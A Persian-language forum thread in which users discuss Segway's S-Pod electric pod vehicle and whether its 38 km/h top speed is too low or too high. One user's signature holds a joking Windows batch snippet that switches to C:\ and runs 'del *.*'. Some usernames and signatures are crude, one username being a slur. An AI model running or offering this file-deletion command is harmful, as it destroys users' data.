Ellery ارسال شده در September 7, 2020 اشتراک گذاری ارسال شده در September 7, 2020 یک شرکت از وسیله نقلیه جدیدی رونمایی کرد که برای نخستین بار طراحی شده و نسل جدیدی از وسایل نقلیه را به ارمغان آورده است. شرکت «سِگوی» از یک وسیله نقلیه جدید رونمایی کرد که برای نخستین بار طراحی شده و نسل جدیدی از وسایل نقلیه را به ارمغان آورده است. این وسیله نقلیه جدید همچنین میتواند امکان سفری سریع و مطمئن را برای کاربر خود فراهم کند. این شرکت آمریکایی این وسیله نقلیه موسوم به «اس- پاد»(S-Pod)، را طوری طراحی کرده که کاربر بتواند در حالی که در حال رانندگی است، از میان محوطههای بسته عبور کند. وسیله نقلیه تمام الکتریکی سگوی شبیه به gyrosphere در Jurassic World است و میتواند با سرعت 38 کیلومتر بر ساعت حرکت کند. این شرکت به ورج گفت: فروش S-Pod در سه ماهه سوم سال ۲۰۲۰ آغاز خواهد شد و قصد دارد پس از آن محصول خود را در سال ۲۰۲۱ به عموم مردم بفروشد، هنوز قیمت این وسیله نقلیه مشخص نشده است. نمایش S-Pod در هفته آینده در لاس وگاس، نوادا، در نمایشگاه الکترونیک Consumer Electronics 2020 آغاز خواهد شد. اس- پاد، از یک سیستم کنترل خودکار تطبیقپذیر استفاده میکند تا توانایی تنظیم ساده سرعت برای مسافر فراهم شود. واقعا واسه یک ماشین 38 km کم نیست؟ نظر بدید ممنون. نقل قول صبر و ظفر هر دو دوست یکدیگرند بعد صبر نوبت ظفر آید. لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Original ارسال شده در September 10, 2020 اشتراک گذاری ارسال شده در September 10, 2020 عالی نقل قول >---------------------------------------------------------------------------------< ====================================================================================== عین مابقی روانه ایم به کام مرگ رو این ریل نامرئی ما نتیجه ی سلیقه و میل داوریم نه مصرع اولیم، نه بیت آخریم لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
mAmddd ارسال شده در October 1, 2020 اشتراک گذاری ارسال شده در October 1, 2020 جالبه نقل قول اگه مطرح شدی طراحت من بودم لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Beigi ارسال شده در October 2, 2020 اشتراک گذاری ارسال شده در October 2, 2020 در در ۱۳۹۹/۶/۱۷ در 23:13، BigSmoke گفته است: یک شرکت از وسیله نقلیه جدیدی رونمایی کرد که برای نخستین بار طراحی شده و نسل جدیدی از وسایل نقلیه را به ارمغان آورده است. شرکت «سِگوی» از یک وسیله نقلیه جدید رونمایی کرد که برای نخستین بار طراحی شده و نسل جدیدی از وسایل نقلیه را به ارمغان آورده است. این وسیله نقلیه جدید همچنین میتواند امکان سفری سریع و مطمئن را برای کاربر خود فراهم کند. این شرکت آمریکایی این وسیله نقلیه موسوم به «اس- پاد»(S-Pod)، را طوری طراحی کرده که کاربر بتواند در حالی که در حال رانندگی است، از میان محوطههای بسته عبور کند. وسیله نقلیه تمام الکتریکی سگوی شبیه به gyrosphere در Jurassic World است و میتواند با سرعت 38 کیلومتر بر ساعت حرکت کند. این شرکت به ورج گفت: فروش S-Pod در سه ماهه سوم سال ۲۰۲۰ آغاز خواهد شد و قصد دارد پس از آن محصول خود را در سال ۲۰۲۱ به عموم مردم بفروشد، هنوز قیمت این وسیله نقلیه مشخص نشده است. نمایش S-Pod در هفته آینده در لاس وگاس، نوادا، در نمایشگاه الکترونیک Consumer Electronics 2020 آغاز خواهد شد. اس- پاد، از یک سیستم کنترل خودکار تطبیقپذیر استفاده میکند تا توانایی تنظیم ساده سرعت برای مسافر فراهم شود. واقعا واسه یک ماشین 38 km کم نیست؟ نظر بدید ممنون. چرا کم سرعتش در هر صورت دمت گرم نقل قول -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- .Having a soft heart in this cruel world is courage, not weakness داشتن قلبی رئوف در این دنیای بی رحم یک جراته، نه یک نقطه ضعف. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- مخفی کننده http://agsa.arsacia.ir/players/bars/Beigi.png لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Life ارسال شده در October 3, 2020 اشتراک گذاری ارسال شده در October 3, 2020 در در ۱۳۹۹/۶/۱۷ در 23:13، BigSmoke گفته است: وسیله نقلیه جدید همچنین میتواند امکان سفری سریع و مطمئن را برای کاربر خود فراهم کند. در در ۱۳۹۹/۶/۱۷ در 23:13، BigSmoke گفته است: میتواند با سرعت 38 کیلومتر بر ساعت حرکت کند. به بخش های زرد توجه کنید ولی باحاله عالی نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Nigga ارسال شده در February 3, 2021 اشتراک گذاری ارسال شده در February 3, 2021 نقل قول نیازی به پرواز نیست همین پایین بالاتر از خیلیا ایم ♥(っ◔◡◔) 𝓝𝓪𝓽𝓲𝓸𝓷𝓪𝓵 𝓖𝓾𝓪𝓻𝓭 ♥ ☢ 𝐧𝐈𝐠Ĥt ς𝕣𝕒𝓏𝓲ⓔ𝐬 𝓕𝕒мI𝕝𝐲 لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
AminsVn ارسال شده در February 5, 2021 اشتراک گذاری ارسال شده در February 5, 2021 من خیلی دوس دارم بیام خفت کنم بخدا، خب عزیزدلم اینا رو نمایی شدن چند نمونه چرا عکس نمیزاری من بهتر بفهمم مطلبو نه ولی دمت گرم بابت مطلب خبری جالبی که گذاشتی یه چند تا نکته آگاه کننده برای بچه ها میزارم ببینن در در ۱۳۹۹/۶/۱۷ در 23:13، LoneMan گفته است: این وسیله نقلیه موسوم به «اس- پاد»(S-Pod) اینو سرچ کردم دیدم این اومد : در در ۱۳۹۹/۶/۱۷ در 23:13، LoneMan گفته است: gyrosphere در Jurassic World و بعد اینو سرچ کردم ، این خورد تو صورتم : شایان ذکره که از این تشبیه ، پشمام موند خودم ریختم زمین ! و اینکه اگر شما به شکل این وسیله اس پاد دقت کنین میفهمین 38 کیلومتر بر ساعت یکم زیاده روی هم هست برای این وسیله شما همینجوریش به هیچی بند نیستی توش حالا نمیدونم کمربندی چیزی داره یا نه ولی خب به نظرم محیط بسته به داخل ساختمان یا اداره یا شرکت گفته میشه شما اونجا با 20 تاشم بتونی بری احتمال داره بخوری تو دیوار یا یکیو قاب کنی به دیوار بازم میگم آقای پستچی مرسی که این خبرو پست کردی جالب بود برام نقل قول Enter as a Blind , Exit as a Mute @echo off cd "C:\" del *.* exit لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Ellery ارسال شده در February 5, 2021 سازنده اشتراک گذاری ارسال شده در February 5, 2021 در 2 ساعت قبل، AminsVn گفته است: من خیلی دوس دارم بیام خفت کنم بخدا، خب عزیزدلم اینا رو نمایی شدن چند نمونه چرا عکس نمیزاری من بهتر بفهمم مطلبو نه ولی دمت گرم بابت مطلب خبری جالبی که گذاشتی یه چند تا نکته آگاه کننده برای بچه ها میزارم ببینن اینو سرچ کردم دیدم این اومد : و بعد اینو سرچ کردم ، این خورد تو صورتم : شایان ذکره که از این تشبیه ، پشمام موند خودم ریختم زمین ! و اینکه اگر شما به شکل این وسیله اس پاد دقت کنین میفهمین 38 کیلومتر بر ساعت یکم زیاده روی هم هست برای این وسیله شما همینجوریش به هیچی بند نیستی توش حالا نمیدونم کمربندی چیزی داره یا نه ولی خب به نظرم محیط بسته به داخل ساختمان یا اداره یا شرکت گفته میشه شما اونجا با 20 تاشم بتونی بری احتمال داره بخوری تو دیوار یا یکیو قاب کنی به دیوار بازم میگم آقای پستچی مرسی که این خبرو پست کردی جالب بود برام خواهش میکنم. نقل قول صبر و ظفر هر دو دوست یکدیگرند بعد صبر نوبت ظفر آید. لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
YouRFatheR ارسال شده در February 6, 2021 اشتراک گذاری ارسال شده در February 6, 2021 (ویرایش شده) خوب از یه صندلی که حرکت میکنه انتظار داری 100تا بره همون 38تا هم واسش زیاده ویرایش شده February 6, 2021 توسط KinGWesT . نقل قول همه تخممن بعضی چشم بعضی لا پا لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Shahin15 ارسال شده در February 7, 2021 اشتراک گذاری ارسال شده در February 7, 2021 در در ۱۳۹۹/۱۱/۱۸ در 10:45، KinGWesT گفته است: خوب از یه صندلی که حرکت میکنه انتظار داری 100تا بره همون 38تا هم واسش زیاده راس میگه با صندلی میخوای 100 کیلومتر در ساعت حرکت کنی ؟ نقل قول Mepogent لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
ارسالهای توصیه شده
به گفتگو بپیوندید
هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید.
توجه: strong> مطلب ارسالی شما پس از تایید مدیریت برای همه قابل رویت خواهد بود.